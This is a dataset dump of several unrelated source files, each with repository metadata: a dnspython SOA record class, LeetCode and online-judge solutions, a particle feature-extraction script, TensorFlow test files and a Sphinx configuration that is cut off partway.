| permissive | PacktPublishing/-AWS-Certified-Developer---Associate-Certification | ae99b6c1efb30e8fab5b76e3d8c821823a4cd852 | b9838b4e038b42ad1813a296379cbbc40cab6286 | refs/heads/master | 2022-11-03T04:37:49.014335 | 2022-10-31T05:42:19 | 2022-10-31T05:42:19 | 219,964,717 | 13 | 11 | MIT | 2021-06-02T00:57:45 | 2019-11-06T09:54:09 | Python | UTF-8 | Python | false | false | 4,597 | py | # Copyright (C) Dnspython Contributors, see LICENSE for text of ISC license
# Copyright (C) 2003-2007, 2009-2011 Nominum, Inc.
#
# Permission to use, copy, modify, and distribute this software and its
# documentation for any purpose with or without fee is hereby granted,
# provided that the above copyright notice and this permission notice
# appear in all copies.
#
# THE SOFTWARE IS PROVIDED "AS IS" AND NOMINUM DISCLAIMS ALL WARRANTIES
# WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF
# MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL NOMINUM BE LIABLE FOR
# ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES
# WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN
# ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT
# OF OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
import struct
import dns.exception
import dns.rdata
import dns.name
class SOA(dns.rdata.Rdata):
"""SOA record
@ivar mname: the SOA MNAME (master name) field
@type mname: dns.name.Name object
@ivar rname: the SOA RNAME (responsible name) field
@type rname: dns.name.Name object
@ivar serial: The zone's serial number
@type serial: int
@ivar refresh: The zone's refresh value (in seconds)
@type refresh: int
@ivar retry: The zone's retry value (in seconds)
@type retry: int
@ivar expire: The zone's expiration value (in seconds)
@type expire: int
@ivar minimum: The zone's negative caching time (in seconds, called
"minimum" for historical reasons)
@type minimum: int
@see: RFC 1035"""
__slots__ = ['mname', 'rname', 'serial', 'refresh', 'retry', 'expire',
'minimum']
def __init__(self, rdclass, rdtype, mname, rname, serial, refresh, retry,
expire, minimum):
super(SOA, self).__init__(rdclass, rdtype)
self.mname = mname
self.rname = rname
self.serial = serial
self.refresh = refresh
self.retry = retry
self.expire = expire
self.minimum = minimum
def to_text(self, origin=None, relativize=True, **kw):
mname = self.mname.choose_relativity(origin, relativize)
rname = self.rname.choose_relativity(origin, relativize)
return '%s %s %d %d %d %d %d' % (
mname, rname, self.serial, self.refresh, self.retry,
self.expire, self.minimum)
@classmethod
def from_text(cls, rdclass, rdtype, tok, origin=None, relativize=True):
mname = tok.get_name()
rname = tok.get_name()
mname = mname.choose_relativity(origin, relativize)
rname = rname.choose_relativity(origin, relativize)
serial = tok.get_uint32()
refresh = tok.get_ttl()
retry = tok.get_ttl()
expire = tok.get_ttl()
minimum = tok.get_ttl()
tok.get_eol()
return cls(rdclass, rdtype, mname, rname, serial, refresh, retry,
expire, minimum)
def to_wire(self, file, compress=None, origin=None):
self.mname.to_wire(file, compress, origin)
self.rname.to_wire(file, compress, origin)
five_ints = struct.pack('!IIIII', self.serial, self.refresh,
self.retry, self.expire, self.minimum)
file.write(five_ints)
def to_digestable(self, origin=None):
return self.mname.to_digestable(origin) + \
self.rname.to_digestable(origin) + \
struct.pack('!IIIII', self.serial, self.refresh,
self.retry, self.expire, self.minimum)
@classmethod
def from_wire(cls, rdclass, rdtype, wire, current, rdlen, origin=None):
(mname, cused) = dns.name.from_wire(wire[: current + rdlen], current)
current += cused
rdlen -= cused
(rname, cused) = dns.name.from_wire(wire[: current + rdlen], current)
current += cused
rdlen -= cused
if rdlen != 20:
raise dns.exception.FormError
five_ints = struct.unpack('!IIIII',
wire[current: current + rdlen])
if origin is not None:
mname = mname.relativize(origin)
rname = rname.relativize(origin)
return cls(rdclass, rdtype, mname, rname,
five_ints[0], five_ints[1], five_ints[2], five_ints[3],
five_ints[4])
def choose_relativity(self, origin=None, relativize=True):
self.mname = self.mname.choose_relativity(origin, relativize)
self.rname = self.rname.choose_relativity(origin, relativize)
| [
"[email protected]"
]
| |
d8adcfa0328f753994b60200ace6ca4d145e0f23 | 3d5bcd57b893c95bbcbfafe77bbc33c65432c9ed | /Algorithms/LeetCode/L0079exist.py | c6486ef5bca5b6781c64631e90da4eed40b18976 | []
| no_license | arunachalamev/PythonProgramming | c160f34c7cb90e82cd0d4762ff9dcb4abadf9c1c | ea188aaa1b72511aeb769a2829055d0aae55e73e | refs/heads/master | 2021-06-04T03:50:37.976293 | 2020-11-12T19:52:28 | 2020-11-12T19:52:28 | 97,364,002 | 3 | 0 | null | null | null | null | UTF-8 | Python | false | false | 702 | py |
def exist(board, word):
m,n = len(board), len(board[0])
def search(i,j,word):
nonlocal m,n
if len(word) == 0:
return True
if i<0 or i==m or j <0 or j==n or board[i][j] !=word[0]:
return False
board[i][j] = '#'
for di,dj in [(0,1),(0,-1),(1,0),(-1,0)]:
if search (i+di, j+dj , word[1:]):
return True
board[i][j] = word[0]
return False
for i,row in enumerate(board):
for j,_ in enumerate(row):
if search(i,j,word):
return True
return False
print (exist([
['A','B','C','E'],
['S','F','C','S'],
['A','D','E','E']
], 'ABCCEDX')) | [
"[email protected]"
]
| |
0bf7dd56ef9f8d3dc81a166b9e292152ff8911ac | 2aba3c043ce4ef934adce0f65bd589268ec443c5 | /AOJ/courses/ITP1/3_C.py | 221621fc02dd16be341b7f831191bed733e02394 | []
| no_license | kambehmw/algorithm_python | 4f66593b77039d90515d1fcbecacdab8c811b92f | 17222399dcc92fd8f908e5774a9883e2e89c486e | refs/heads/master | 2020-06-02T12:44:11.322356 | 2020-05-18T13:22:05 | 2020-05-18T13:22:05 | 191,157,113 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 179 | py | while True:
x, y = map(int, input().split())
if x == 0 and y == 0:
exit()
else:
if x < y:
print(x, y)
else:
print(y, x) | [
"[email protected]"
]
| |
8af8b1154126237b12e676c20db0981a5f9e3d8e | 8a14a7724d00f1eb7791e53f8446e99ecc975605 | /scripts/extract_features.py | 95649f83351e38ae3501cff705bf80339edd1315 | [
"Apache-2.0"
]
| permissive | aschn/picolo | 3fa7b26d079fc9687de9c3e1e34cae774bcf8416 | 1f8f50e0709fdaef31bc38045ef9fd0c46aae2b5 | refs/heads/master | 2020-04-30T01:37:36.587287 | 2013-07-19T00:32:05 | 2013-07-19T00:32:05 | 9,307,233 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,229 | py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
@author Anna Schneider
@version 0.1
@brief Typical script using picolo to extract features from point particles
"""
import picolo
from shapes import shape_factory_from_values
import argparse
import os.path as path
import time
import csv
# start timer
start = time.time()
# parse command-line arguments
brief = 'Typical script using picolo to extract features from point particles.'
parser = argparse.ArgumentParser(description=brief)
parser.add_argument('filename', type=str, help='path to xy coord file')
parser.add_argument('shape', type=str, help='type of features to extract',
choices=['UnitCell', 'Fourier', 'Zernike'])
parser.add_argument('dist', type=float, help='distance cutoff to neighbors')
parser.add_argument('--train', action='store_true',
help='include flag to only get features for prespecified training rows')
args = parser.parse_args()
# set up file paths
rootname, ext = path.splitext(args.filename)
dirname = path.dirname(args.filename)
# set up matcher
matcher = picolo.Matcher(args.filename, delim=' ', name=rootname,
trainingcol=2)
# create and add default shape of correct type
shape = shape_factory_from_values(args.shape,
optdata={'neighbor_dist': args.dist,
'max_dist': args.dist})
matcher.shapes.add('test', shape)
# get ndarray of features and particle ids by comparing to 'test' shape
features = matcher.feature_matrix('test')
# open csv writer
outfile = '%s_%s_features.dat' % (rootname, args.shape)
writer = csv.writer(open(outfile, 'w'), delimiter=' ')
# write header
writer.writerow(['id'] + shape.get_components())
# loop over particle ids
if args.train:
inds = matcher.training_ids
else:
inds = range(matcher.config.N)
for ip in inds:
# only write features for particles with valid shapes
if matcher.get_features('test', ip).get('is_valid'):
# write row of features
writer.writerow([ip] + ['%0.4f' % x for x in features[ip]])
# end timer
end = time.time()
print 'Done with %s ... took %d seconds.' % (rootname, end-start)
| [
"[email protected]"
]
| |
1eadf13b44ed3ecced195ac1f6974c5866be1f8b | 37efda4646f478b66674e384e1bc139e7874d972 | /practice/RaodtoMillionaire.py | 7677b54444573abaec9ffa4c8c2fa22f69a24b2b | []
| no_license | siberian122/kyoupuro | 02c1c40f7c09ff0c07a1d50b727f860ad269d8b1 | 8bf5e5b354d82f44f54c80f1fc014c9519de3ca4 | refs/heads/master | 2023-04-04T02:45:29.445107 | 2021-04-20T07:37:47 | 2021-04-20T07:37:47 | 299,248,378 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 380 | py | n = int(input())
a = list(map(int, input().split()))
b = []
for i in range(n-1):
num = a[i]-a[i+1]
b.append(num)
now = 1000
stock = 0
for i in range(n-1):
if b[i] > 0: # 売る
now += stock*a[i]
stock = 0
elif now > 0 and b[i] < 0: # 買う
stock += now//a[i]
now = now % a[i]
#print(now, stock)
now += a[-1]*stock
print(now)
| [
"[email protected]"
]
| |
c96667e76a4d649fc180fffd2ee6abb688e027cb | d4fdbd68c42d6b9babe347cb3b65535e4d782172 | /tensorflow_datasets/image/voc_test.py | 1bbb9140e84808b1f66441b6ba103c2e8483ec03 | [
"Apache-2.0"
]
| permissive | thanhkaist/datasets | 2809260c5e95e96d136059bea042d1ed969a6fcf | 02da35c558ec8ea704e744a2008c5cecb2e7a0a1 | refs/heads/master | 2020-06-04T16:13:14.603449 | 2019-06-14T22:01:33 | 2019-06-14T22:02:54 | 192,097,735 | 2 | 0 | Apache-2.0 | 2019-06-15T16:02:18 | 2019-06-15T16:02:18 | null | UTF-8 | Python | false | false | 1,060 | py | # coding=utf-8
# Copyright 2019 The TensorFlow Datasets Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tests for PASCAL VOC image data loading."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from tensorflow_datasets import testing
from tensorflow_datasets.image import voc
class Voc2007Test(testing.DatasetBuilderTestCase):
DATASET_CLASS = voc.Voc2007
SPLITS = {
'train': 1,
'validation': 2,
'test': 3,
}
if __name__ == '__main__':
testing.test_main()
| [
"[email protected]"
]
| |
2fc48de98fbc2450366953e3be1285d20c36401a | ac8ffabf4d7339c5466e53dafc3f7e87697f08eb | /python_solutions/1080.insufficient-nodes-in-root-to-leaf-paths.py | 4ba1ede95bb6688d9b4c3e860ddfe8e1d3dd646d | []
| no_license | h4hany/leetcode | 4cbf23ea7c5b5ecfd26aef61bfc109741f881591 | 9e4f6f1a2830bd9aab1bba374c98f0464825d435 | refs/heads/master | 2023-01-09T17:39:06.212421 | 2020-11-12T07:26:39 | 2020-11-12T07:26:39 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,173 | py | from collections import Counter, defaultdict, OrderedDict, deque
from bisect import bisect_left, bisect_right
from functools import reduce, lru_cache
from typing import List
import itertools
import math
import heapq
import string
true = True
false = False
MIN, MAX, MOD = -0x3f3f3f3f, 0x3f3f3f3f, 1000000007
#
# @lc app=leetcode id=1080 lang=python3
#
# [1080] Insufficient Nodes in Root to Leaf Paths
#
# https://leetcode.com/problems/insufficient-nodes-in-root-to-leaf-paths/description/
#
# algorithms
# Medium (49.43%)
# Total Accepted: 14.4K
# Total Submissions: 29K
# Testcase Example: '[1,2,3,4,-99,-99,7,8,9,-99,-99,12,13,-99,14]\n1'
#
# Given the root of a binary tree, consider all root to leaf paths: paths from
# the root to any leaf. (A leaf is a node with no children.)
#
# A node is insufficient if every such root to leaf path intersecting this node
# has sum strictly less than limit.
#
# Delete all insufficient nodes simultaneously, and return the root of the
# resulting binary tree.
#
#
#
# Example 1:
#
#
#
# Input: root = [1,2,3,4,-99,-99,7,8,9,-99,-99,12,13,-99,14], limit = 1
#
# Output: [1,2,3,4,null,null,7,8,9,null,14]
#
#
#
# Example 2:
#
#
#
# Input: root = [5,4,8,11,null,17,4,7,1,null,null,5,3], limit = 22
#
# Output: [5,4,8,11,null,17,4,7,null,null,null,5]
#
#
#
# Example 3:
#
#
#
# Input: root = [1,2,-3,-5,null,4,null], limit = -1
#
# Output: [1,null,-3,4]
#
#
#
#
# Note:
#
#
# The given tree will have between 1 and 5000 nodes.
# -10^5 <= node.val <= 10^5
# -10^9 <= limit <= 10^9
#
#
#
#
#
#
#
# Definition for a binary tree node.
# class TreeNode:
# def __init__(self, val=0, left=None, right=None):
# self.val = val
# self.left = left
# self.right = right
class Solution:
def sufficientSubset(self, root: TreeNode, limit: int) -> TreeNode:
if not root: return None
if not root.left and not root.right:
return root if root.val >= limit else None
root.left = self.sufficientSubset(root.left, limit - root.val)
root.right = self.sufficientSubset(root.right, limit - root.val)
return None if not root.left and not root.right else root
| [
"[email protected]"
]
| |
75a63b080058ba26e1aa2ae9b422c95c519a403c | 3e93c3bbe35c24bf7f1a75c612ab300f37063621 | /C1/L1_18_mappingnameseq_namedtuple.py | f393d21fd2cf887c699056da4973e6a7725476db | []
| no_license | rengokantai/orpycok3ed | 5ac0195a48f02dcc5bbc720e812f637464215e8f | 50ce744265dc6af0d1a4724ea52348faeb47764d | refs/heads/master | 2021-01-10T05:05:53.477092 | 2016-03-12T20:04:45 | 2016-03-12T20:04:45 | 53,352,163 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 693 | py | __author__ = 'Hernan Y.Ke'
from collections import namedtuple
# memorize this syntax
Me = namedtuple('Me',['first','last'])
me = Me(1,2)
print(me.first,me.last)
she=[Me(3,4),Me(5,6)]
#me = Me(first=1,last=2) # illegal!
me = me._replace(first=3)
print(me.first)
# get namedtuple
def get_num(tuplearr):
res=0
for param in tuplearr:
s = Me(*param) # iterate a array with namedtuple instance. param->All params of a instance
res+=s.first+s.last
return res
print(get_num(she))
#replace all params
def replace_params(tupleparams):
return me._replace(**tupleparams) # two stars. kwargs
newparams={'first':7,'last':8}
print(replace_params(newparams)) | [
"[email protected]"
]
| |
ca2e60ef61a63bcc4473f3bb4ca159430fb5c13a | eb9f655206c43c12b497c667ba56a0d358b6bc3a | /python/testData/intentions/PyAnnotateTypesIntentionTest/methodAfterConstructorCall.py | 0cdc87e27827504a3baf5a3c8d4524a6604e3e8c | [
"Apache-2.0"
]
| permissive | JetBrains/intellij-community | 2ed226e200ecc17c037dcddd4a006de56cd43941 | 05dbd4575d01a213f3f4d69aa4968473f2536142 | refs/heads/master | 2023-09-03T17:06:37.560889 | 2023-09-03T11:51:00 | 2023-09-03T12:12:27 | 2,489,216 | 16,288 | 6,635 | Apache-2.0 | 2023-09-12T07:41:58 | 2011-09-30T13:33:05 | null | UTF-8 | Python | false | false | 133 | py | class MyClass:
def __init__(self):
pass
def method(self, x):
pass
x = MyClass()
foo = x.met<caret>hod(42)
| [
"[email protected]"
]
| |
daec12433149d0fa4a8fe97be29bea0af0818e98 | d94b6845aeeb412aac6850b70e22628bc84d1d6d | /tunas/schema_test.py | c27def77e798c010f8c380efefd021e51bc209c9 | [
"CC-BY-4.0",
"Apache-2.0"
]
| permissive | ishine/google-research | 541aea114a68ced68736340e037fc0f8257d1ea2 | c1ae273841592fce4c993bf35cdd0a6424e73da4 | refs/heads/master | 2023-06-08T23:02:25.502203 | 2023-05-31T01:00:56 | 2023-05-31T01:06:45 | 242,478,569 | 0 | 0 | Apache-2.0 | 2020-06-23T01:55:11 | 2020-02-23T07:59:42 | Jupyter Notebook | UTF-8 | Python | false | false | 8,923 | py | # coding=utf-8
# Copyright 2023 The Google Research Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tests for schema."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import collections
import tensorflow.compat.v1 as tf
from tunas import schema
class SchemaTest(tf.test.TestCase):
def test_oneof_equality_simple(self):
not_one_of = collections.namedtuple(
'NotOneOf', ['choices', 'tag', 'mask'])
tensor1 = tf.constant([3.0])
tensor2 = tf.constant([4.0])
self.assertEqual(
schema.OneOf([1, 2], 'foo'),
schema.OneOf([1, 2], 'foo'))
self.assertEqual(
schema.OneOf([1, 2], 'foo', tensor1),
schema.OneOf([1, 2], 'foo', tensor1))
self.assertNotEqual(
schema.OneOf([1, 2], 'foo'),
schema.OneOf([1], 'foo'))
self.assertNotEqual(
schema.OneOf([1, 2], 'foo'),
schema.OneOf([1, 2], 'bar'))
self.assertNotEqual(
schema.OneOf([1, 2], 'foo', tensor1),
schema.OneOf([1, 2], 'foo', None))
self.assertNotEqual(
schema.OneOf([1, 2], 'foo', tensor1),
schema.OneOf([1, 2], 'foo', tensor2))
self.assertNotEqual(
schema.OneOf([1, 2], 'foo', tensor1),
not_one_of([1, 2], 'foo', tensor1))
self.assertNotEqual(
schema.OneOf([1, 2], 'foo'),
{})
self.assertNotEqual(
{},
schema.OneOf([1, 2], 'foo'))
def test_oneof_equality_nested(self):
self.assertEqual(
schema.OneOf([schema.OneOf([1, 2], 'a'), schema.OneOf([3], 'b')], 'c'),
schema.OneOf([schema.OneOf([1, 2], 'a'), schema.OneOf([3], 'b')], 'c'))
self.assertNotEqual(
schema.OneOf([schema.OneOf([1, 2], 'a'), schema.OneOf([3], 'b')], 'c'),
schema.OneOf([schema.OneOf([1, 2], 'a'), schema.OneOf([4], 'b')], 'c'))
self.assertNotEqual(
schema.OneOf([schema.OneOf([1, 2], 'a'), schema.OneOf([3], 'b')], 'c'),
schema.OneOf([schema.OneOf([1, 5], 'a'), schema.OneOf([3], 'b')], 'c'))
self.assertNotEqual(
schema.OneOf([schema.OneOf([1, 2], 'a'), schema.OneOf([3], 'b')], 'c'),
'Goooooooooooooooooooooooooooooooooooooooooooooogle')
def test_oneof_repr(self):
self.assertEqual(
repr(schema.OneOf([1, 2], 'foo')),
'OneOf(choices=[1, 2], tag=\'foo\')')
self.assertStartsWith(
repr(schema.OneOf([1, 2], 'foo', tf.constant([3.0]))),
'OneOf(choices=[1, 2], tag=\'foo\', mask=')
def test_map_oenofs_with_tuple_paths_trivial(self):
structure = schema.OneOf([1, 2], 'tag')
all_paths = []
all_oneofs = []
def visit(path, oneof):
all_paths.append(path)
all_oneofs.append(oneof)
return schema.OneOf([x*10 for x in oneof.choices], oneof.tag)
self.assertEqual(schema.map_oneofs_with_tuple_paths(visit, structure),
schema.OneOf([10, 20], 'tag'))
self.assertEqual(all_paths, [()])
self.assertEqual(all_oneofs, [schema.OneOf([1, 2], 'tag')])
def test_map_oneofs_with_tuple_paths_simple(self):
structure = [
schema.OneOf([1, 2], 'tag1'),
schema.OneOf([3, 4, 5], 'tag2'),
]
all_paths = []
all_oneofs = []
def visit(path, oneof):
all_paths.append(path)
all_oneofs.append(oneof)
return schema.OneOf([x*10 for x in oneof.choices], oneof.tag)
self.assertEqual(schema.map_oneofs_with_tuple_paths(visit, structure), [
schema.OneOf([10, 20], 'tag1'),
schema.OneOf([30, 40, 50], 'tag2'),
])
self.assertEqual(all_paths, [
(0,),
(1,)
])
self.assertEqual(all_oneofs, [
schema.OneOf([1, 2], 'tag1'),
schema.OneOf([3, 4, 5], 'tag2'),
])
def test_map_oneofs_with_tuple_paths_containing_arrays_and_dicts(self):
structure = {
'foo': [
schema.OneOf([1, 2], 'tag1'),
schema.OneOf([3, 4, 5], 'tag2'),
]}
all_paths = []
all_oneofs = []
def visit(path, oneof):
all_paths.append(path)
all_oneofs.append(oneof)
return schema.OneOf([x*10 for x in oneof.choices], oneof.tag)
self.assertEqual(schema.map_oneofs_with_tuple_paths(visit, structure), {
'foo': [
schema.OneOf([10, 20], 'tag1'),
schema.OneOf([30, 40, 50], 'tag2'),
]})
self.assertEqual(all_paths, [
('foo', 0),
('foo', 1),
])
self.assertEqual(all_oneofs, [
schema.OneOf([1, 2], 'tag1'),
schema.OneOf([3, 4, 5], 'tag2'),
])
def test_map_oneofs_with_tuple_paths_containing_nested_oneofs(self):
structure = {
'root': schema.OneOf([
schema.OneOf([
{'leaf': schema.OneOf([1, 10], 'level2')},
{'leaf': schema.OneOf([2, 20], 'level2')},
], 'level1'),
schema.OneOf([
{'leaf': schema.OneOf([3, 30], 'level2')},
{'leaf': schema.OneOf([4, 40], 'level2')},
{'leaf': schema.OneOf([5, 50], 'level2')},
], 'level1')
], 'level0')
}
all_paths = []
all_oneofs = []
def visit(path, oneof):
all_paths.append(path)
all_oneofs.append(oneof)
return schema.OneOf([oneof.choices[0]], oneof.tag)
self.assertEqual(
schema.map_oneofs_with_tuple_paths(visit, structure),
{
'root': schema.OneOf([
schema.OneOf([
{'leaf': schema.OneOf([1], 'level2')},
], 'level1'),
], 'level0')
})
self.assertEqual(all_paths, [
('root', 'choices', 0, 'choices', 0, 'leaf'),
('root', 'choices', 0, 'choices', 1, 'leaf'),
('root', 'choices', 0),
('root', 'choices', 1, 'choices', 0, 'leaf'),
('root', 'choices', 1, 'choices', 1, 'leaf'),
('root', 'choices', 1, 'choices', 2, 'leaf'),
('root', 'choices', 1),
('root',),
])
# A OneOf node's children should already be updated by the time we visit it.
self.assertEqual(all_oneofs, [
schema.OneOf([1, 10], 'level2'),
schema.OneOf([2, 20], 'level2'),
schema.OneOf(
[
{'leaf': schema.OneOf([1], 'level2')},
{'leaf': schema.OneOf([2], 'level2')},
], 'level1'),
schema.OneOf([3, 30], 'level2'),
schema.OneOf([4, 40], 'level2'),
schema.OneOf([5, 50], 'level2'),
schema.OneOf(
[
{'leaf': schema.OneOf([3], 'level2')},
{'leaf': schema.OneOf([4], 'level2')},
{'leaf': schema.OneOf([5], 'level2')},
], 'level1'),
schema.OneOf(
[
schema.OneOf([
{'leaf': schema.OneOf([1], 'level2')},
], 'level1'),
schema.OneOf([
{'leaf': schema.OneOf([3], 'level2')},
], 'level1')
], 'level0'),
])
def test_map_oneofs_with_paths(self):
structure = {
'foo': [
schema.OneOf([1, 2], 'tag1'),
schema.OneOf([3, 4, 5], 'tag2'),
]}
all_paths = []
all_oneofs = []
def visit(path, oneof):
all_paths.append(path)
all_oneofs.append(oneof)
return schema.OneOf([x*10 for x in oneof.choices], oneof.tag)
self.assertEqual(schema.map_oneofs_with_paths(visit, structure), {
'foo': [
schema.OneOf([10, 20], 'tag1'),
schema.OneOf([30, 40, 50], 'tag2'),
]})
self.assertEqual(all_paths, [
'foo/0',
'foo/1',
])
self.assertEqual(all_oneofs, [
schema.OneOf([1, 2], 'tag1'),
schema.OneOf([3, 4, 5], 'tag2'),
])
def test_map_oneofs(self):
structure = {
'foo': [
schema.OneOf([1, 2], 'tag1'),
schema.OneOf([3, 4, 5], 'tag2'),
]}
all_oneofs = []
def visit(oneof):
all_oneofs.append(oneof)
return schema.OneOf([x*10 for x in oneof.choices], oneof.tag)
self.assertEqual(schema.map_oneofs(visit, structure), {
'foo': [
schema.OneOf([10, 20], 'tag1'),
schema.OneOf([30, 40, 50], 'tag2'),
]})
self.assertEqual(all_oneofs, [
schema.OneOf([1, 2], 'tag1'),
schema.OneOf([3, 4, 5], 'tag2'),
])
if __name__ == '__main__':
tf.disable_v2_behavior()
tf.test.main()
| [
"[email protected]"
]
| |
88a1fb94a80440856187d57d3df5d55a56f854f5 | 0dc8627205c1545b4a5d82d1b9e55bc64eedc0b8 | /transcripts/conf.py | 3f10dbffa1b2b69fda708f5fbb98846f344db5cd | []
| no_license | evildmp/DjangoConEuropeTranscripts | 508ee00c1c2bde803dd13aaac6171eb9fbcbb2db | d21e57780e1b4c497d8a700e5b99999bded9f303 | refs/heads/master | 2016-08-11T06:52:40.669453 | 2015-08-13T22:32:33 | 2015-08-13T22:32:33 | 36,973,906 | 12 | 9 | null | 2017-01-01T08:49:40 | 2015-06-06T09:01:29 | Python | UTF-8 | Python | false | false | 9,937 | py | # -*- coding: utf-8 -*-
#
# Speech-to-text reports from DjangoCon Europe 2015 build configuration file, created by
# sphinx-quickstart on Sat Jun 6 09:11:53 2015.
#
# This file is execfile()d with the current directory set to its
# containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
import sys
import os
import shlex
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
#sys.path.insert(0, os.path.abspath('.'))
# -- General configuration ------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
#needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom
# ones.
extensions = []
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix(es) of source filenames.
# You can specify multiple suffix as a list of string:
# source_suffix = ['.rst', '.md']
source_suffix = '.rst'
# The encoding of source files.
#source_encoding = 'utf-8-sig'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = u'Speech-to-text reports from DjangoCon Europe 2015'
copyright = u'2015, Hilary Maclean and Sheryll Holley'
author = u'Hilary Maclean and Sheryll Holley'
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The short X.Y version.
version = '0.1'
# The full version, including alpha/beta/rc tags.
release = '0.1'
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#
# This is also used if you do content translation via gettext catalogs.
# Usually you set "language" from the command line for these cases.
language = None
# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
#today = ''
# Else, today_fmt is used as the format for a strftime call.
#today_fmt = '%B %d, %Y'
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
exclude_patterns = ['_build']
# The reST default role (used for this markup: `text`) to use for all
# documents.
#default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
#add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
#add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
#show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# A list of ignored prefixes for module index sorting.
#modindex_common_prefix = []
# If true, keep warnings as "system message" paragraphs in the built documents.
#keep_warnings = False
# If true, `todo` and `todoList` produce output, else they produce nothing.
todo_include_todos = False
# -- Options for HTML output ----------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
# html_theme = 'alabaster'
# on_rtd is whether we are on readthedocs.org
on_rtd = os.environ.get('READTHEDOCS', None) == 'True'
if not on_rtd: # only import and set the theme if we're building docs locally
try:
import sphinx_rtd_theme
html_theme = 'sphinx_rtd_theme'
html_theme_path = [sphinx_rtd_theme.get_html_theme_path()]
except:
html_theme = 'default'
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
#html_theme_options = {}
# Add any paths that contain custom themes here, relative to this directory.
#html_theme_path = []
# The name for this set of Sphinx documents. If None, it defaults to
# "<project> v<release> documentation".
#html_title = None
# A shorter title for the navigation bar. Default is the same as html_title.
#html_short_title = None
# The name of an image file (relative to this directory) to place at the top
# of the sidebar.
#html_logo = None
# The name of an image file (within the static path) to use as favicon of the
# docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
#html_favicon = None
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
# Add any extra paths that contain custom files (such as robots.txt or
# .htaccess) here, relative to this directory. These files are copied
# directly to the root of the documentation.
#html_extra_path = []
# If not '', a 'Last updated on:' timestamp is inserted at every page bottom,
# using the given strftime format.
#html_last_updated_fmt = '%b %d, %Y'
# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
#html_use_smartypants = True
# Custom sidebar templates, maps document names to template names.
#html_sidebars = {}
# Additional templates that should be rendered to pages, maps page names to
# template names.
#html_additional_pages = {}
# If false, no module index is generated.
#html_domain_indices = True
# If false, no index is generated.
#html_use_index = True
# If true, the index is split into individual pages for each letter.
#html_split_index = False
# If true, links to the reST sources are added to the pages.
#html_show_sourcelink = True
# If true, "Created using Sphinx" is shown in the HTML footer. Default is True.
#html_show_sphinx = True
# If true, "(C) Copyright ..." is shown in the HTML footer. Default is True.
#html_show_copyright = True
# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it. The value of this option must be the
# base URL from which the finished HTML is served.
#html_use_opensearch = ''
# This is the file name suffix for HTML files (e.g. ".xhtml").
#html_file_suffix = None
# Language to be used for generating the HTML full-text search index.
# Sphinx supports the following languages:
# 'da', 'de', 'en', 'es', 'fi', 'fr', 'hu', 'it', 'ja'
# 'nl', 'no', 'pt', 'ro', 'ru', 'sv', 'tr'
#html_search_language = 'en'
# A dictionary with options for the search language support, empty by default.
# Now only 'ja' uses this config value
#html_search_options = {'type': 'default'}
# The name of a javascript file (relative to the configuration directory) that
# implements a search results scorer. If empty, the default will be used.
#html_search_scorer = 'scorer.js'
# Output file base name for HTML help builder.
htmlhelp_basename = 'Speech-to-textreportsfromDjangoConEurope20155'
# -- Options for LaTeX output ---------------------------------------------
latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
#'papersize': 'letterpaper',
